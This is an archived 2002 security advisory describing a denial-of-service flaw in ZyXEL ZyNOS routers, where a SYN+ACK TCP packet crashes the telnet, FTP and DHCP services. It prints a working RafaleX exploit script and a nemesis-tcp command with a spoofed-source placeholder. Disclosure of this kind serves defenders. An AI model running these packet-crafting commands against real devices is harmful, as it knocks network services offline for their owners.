TUCoPS :: Network Appliances :: napl5462.htm

ZyXEL ZyNOS remote service DoS
18th Jun 2002 [SBWID-5462]
COMMAND

	ZyXEL ZyNOS remote service DoS

SYSTEMS AFFECTED

	ZyXEL 642R(-11) AJ.6 and other routers based on ZyNOS

PROBLEM

	Ueli          Kistler          [iuk@gmx.ch]          of          eclipse
	[http://www.packx.net][http://www.eclipse.fr.fm], says :
	

	A ZyXEL router service can be crashed  by  sending  a  packet  with  TCP
	flags ACK and SYN set  at  the  same  time.  The  service  will  not  be
	available  even  through  RS-232.  Using  a  SYN-FIN  packet  will  make
	inaccessible the service port for a few minutes.
	

	Affected services on  ZyXEL  642R-11  are:  TELNET,  FTP  and  DHCP  (if
	enabled). TELNET and FTP cannot be deactivated.
	

	 Exploit

	 -------

	

	# This is a RafaleX script (Download: www.packx.net)

	# Rafale X script

	# ---------------

	# Action : Make a ZyXEL 642R Prestige Router inaccessible on port 23

	#

	%name=ZyXEL telnet service DoS

	%category=Denial of service

	%date=23-05-2002

	%rafalemin=0.2

	%description=Crash ZyXEL router telnet service with ACK and SYN flag

	

	// Variables

	$done=Target attacked...

	

	// Do the stuff...

	!Display=Please wait...

	!Sleep 500

	PORTDST=23

	IPHEADERSIZE=20

	ACK=1

	SYN=1

	!Display=Sending the packet...

	!SEND 1 TCP

	!Sleep 200

	!Display=ACK/SYN Packet sent! ZyXEL telnet service crashed

	(V2.50(AJ.6))

	

	!Sleep 1000

	

	!Display=$done

	

	NOTE: Set also these  values..  Rafale  used  this  by  default:  ACK=0,
	SEQ=0, WIN=0
	

	Example with nemesis:
	

	nemesis-tcp -v -S %spoofed IP possible% -D %ZyXEL router% -fS -fA -w 0

	-s 0 -a 0 -y 23

	

	

	

	

SOLUTION

	None yet

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2026 AOH